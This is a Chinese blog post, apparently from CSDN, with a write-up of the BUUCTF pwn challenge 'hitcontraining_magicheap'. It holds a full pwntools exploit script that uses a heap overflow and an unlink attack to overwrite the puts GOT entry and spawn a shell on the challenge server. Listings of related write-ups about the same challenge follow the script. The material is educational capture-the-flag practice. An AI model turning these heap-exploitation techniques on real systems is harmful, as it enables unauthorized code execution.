hitcontraining_magicheap buuctf

最新推荐文章于 2024-07-11 11:23:59 发布
最新推荐文章于 2024-07-11 11:23:59 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: PWN 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/122903239
版权
本文详细解析了magicheap程序中的堆溢出漏洞,通过定制chunk大小,实现unlink操作并修改puts函数指针,从而成功执行getshell。展示了利用unlink和heap编辑技巧进行安全漏洞利用的方法和步骤。
摘要由CSDN通过智能技术生成

这题的漏洞点在编辑heap:

可以自定义编辑chunk内容的大小,存在堆溢出漏洞,这道题目打法也有很多。

我自己的思路是:

利用unlink实现任意地址写的效果,修改puts函数got表为l33t,然后getshell。

exp:

from pwn import *
p = remote("node4.buuoj.cn",25162)
#p = process("./magicheap")
e = ELF("./magicheap")
sh_addr = 0x400c50
bss_addr = 0x6020c0
context.log_level  ="debug"
p.timeout = 0.5
def add(size,content):
	p.recvuntil("Your choice :")
	p.sendline("1")
	p.recvuntil("Size of Heap : ")
	p.sendline(str(size))
	p.recvuntil("Content of heap:")
	p.sendline(content)
	p.recvuntil("SuccessFul\n")
def edit(index,size,content):
	p.recvuntil("Your choice :")
	p.sendline("2")
	p.recvuntil("Index :")
	p.sendline(str(index))
	p.recvuntil("Size of Heap : ")
	p.sendline(str(size))
	p.recvuntil("Content of heap : ")
	p.sendline(content)
	p.recvuntil("Done !\n")
def delete(index):
	p.recvuntil("Your choice :")
	p.sendline("3")
	p.recvuntil("Index :")
	p.sendline(str(index))
	p.recvuntil("Done !\n")

add(0x30,"a"*0x30)#0
add(0x30,"a"*0x30)#1
add(0x80,"a"*0x80)#2
add(0x10,"a"*0x10)# 
pl1 = p64(0) + p64(0x31) + p64(bss_addr - 0x10) + p64(bss_addr-0x8) + p64(0) + p64(0)
pl1+=  p64(0x30) + p64(0x90)
edit(1,0x40,pl1)
delete(2)
pl2 = p64(0) + p64(0) + p64(e.got["puts"])
edit(1,0x30,pl2)
edit(0,0x8,p64(sh_addr))
# gdb.attach(p)
# pause()
p.interactive()

执行脚本,成功拿到shell!

 

cut_maize
关注
专栏目录
BUUCTF hitcontraining_magicheap[堆]
weixin_45441024的博客
12-28 395
BUUCTF hitcontraining_magicheap[堆](Unsorted bin attack) 我们先来学习一下什么是Unsorted binattack 用ctfwiki里面的例子来进行解释: Unsorted Bin Attack,顾名思义,该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。 Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。 Unsorted Bin Attack 可以达到的效
hitcontraining_playfmt 解题思路
Morphy_Amo的博客
03-19 743
格式化字符串
hitcontraining magicheap
pondzhang的专栏
06-16 360
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
BUUCTFhitcontraining_magicheap
weixin_51055545的博客
02-13 1686
BUUCTFhitcontraining_magicheap】刷题 例行检查: 程序为64位,除了pie,其他保护机制都开了。放到IDA中分析 漏洞分析: 首先看到一个菜单, 发现程序是没有输出功能的,这里我们想到了去打stdout结构体来leak出地址, 这里是有一个后门的,我设置了满足的条件发现没出flag,应该比赛的环境下flag路径是对的,但buuctf路径是不对的,所以我们就去get shell拿flag。 漏洞点在edit()函数中, creat_heap()函数获取我们的大小后,在ed
BUUCTF hitcontraining_magicheap--[Unsorted_bin->bk修改]3
最新发布
zwb2603096342的博客
07-11 473
ctfpwn -- 堆
[BUUCTF]PWN——hitcontraining_magicheap
mcmuyanga的博客
01-07 1172
hitcontraining_magicheap 附件 步骤: 例行检查,64位程序,开启了nx和canary 本地试运行一下,经典的堆的菜单 64位ida载入,检索程序里的字符串的时候发现了后门 main() 可以看到,当v5=4=4869,而且magic在bss段,只要覆写magic>0x1305就能够获取到shell create_heap() edit_heap() delete_heap() 利用思路:首先通过 unsorted bin attack 覆盖 magic>
buuctf magicheap
qq_42728977的博客
04-22 228
主要是unsorted bin 在拖链的时候的一些细节 参考
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 943
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
【CTF】【PWN】【UAF】【萌新友好向wp】hitcontraining_uaf
m0_50819561的博客
10-08 404
这题的反编译有点阴间。 这是add函数,add一次会malloc两个chunk。 同时要注意,这里的notelist是一个二维数组。notelist[i]表示的其实是notelist[i][0].后面还有一个notelist[i][1]。 我们看notelist[i],他被赋值为print_note_content这个地址的函数。 notelist[i][1]才是真正存放chunk的content的地方。 为什么要把notelist[i]赋值为print_note_content这个地址的函数呢? 下面这
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1105
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
hitcontraining_magicheap
z1r0的博客
12-23 261
hitcontraining_magicheap 查看保护 magic <= 0x1305即可getshell。 edit的时候没有注意size,可以堆溢出,没有pie直接unstoredbin attack。具体的attack看我的blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remo
hitcontraining_magicheap--(基础堆)
2301_80168334的博客
06-27 773
接下来又是对v3进行判断,如果v3>3,接着判断v3是否等于4,如果等于4就exit(0)退出。可以知道这里首先是输入index,并且读取到的数值赋值给了v1,v1还要进行判断,且与create_heap函数中的chunk是有关系的。=2则是会输出"Invalid Choice",else则是进入到edit_heap函数中。,因为malloc () 函数。接下来还是对v3进行判断,如果v3==1则进入到create_heap()函数中。分析完大概得意思了,就进行一个函数一个函数的查看,寻找解题的关键点。
HITCON Training lab14——magic heap
04-19 447
64位程序,没开PIE  #Unsorted Bin Attack 先回顾一下 Unsorted Bin 的基本来源以及基本使用情况。 基本来源 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,...
【unstored bin attack】hitcontraining_magicheap
huzai9527的博客
04-14 149
【unstored bin attack】 1.ida分析 2.思路 经典的unstored bin attack,修改unstored bin 中的bk为magic-0x10 即可将magic改为一个较大的数 3.exp from pwn import * p = remote('node3.buuoj.cn',25879) #p = process('./magicheap') context.log_level = 'debug' def add(size,cont): p.sendlin
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 338
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 1059
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
[BUUCTF]PWN——hitcontraining_unlink
mcmuyanga的博客
01-25 1043
hitcontraining_unlink 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况,经典堆题的菜单 64位ida打开,发现了读出flag的函数?根据buu上的习性,不懂这个路径对不对 main() show() add() edit() delete() 由于存在堆溢出和这个读出flag的函数,我们可以修改fd和bk的值,尝试使用fastbin attack。 #coding:utf-8 from pwn import * conte
hitcontraining_heapcreator
m0sway的博客
01-07 2882
hitcontraining_heapcreator 使用checksec查看: 开启了Canary和栈不可执行,没有开启PIE。 先运行一下看看: 看到菜单,堆题,放进IDA中查看: 分布来查看,首先是create_heap(): heaparray[i] = malloc(0x10uLL):创建用户所需chunk前程序会先创建一个0x10大小的chunk v0[1] = malloc(size);:程序所创建的chunk中存放了用户所创的chunk的地址 edit_heap(): rea
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值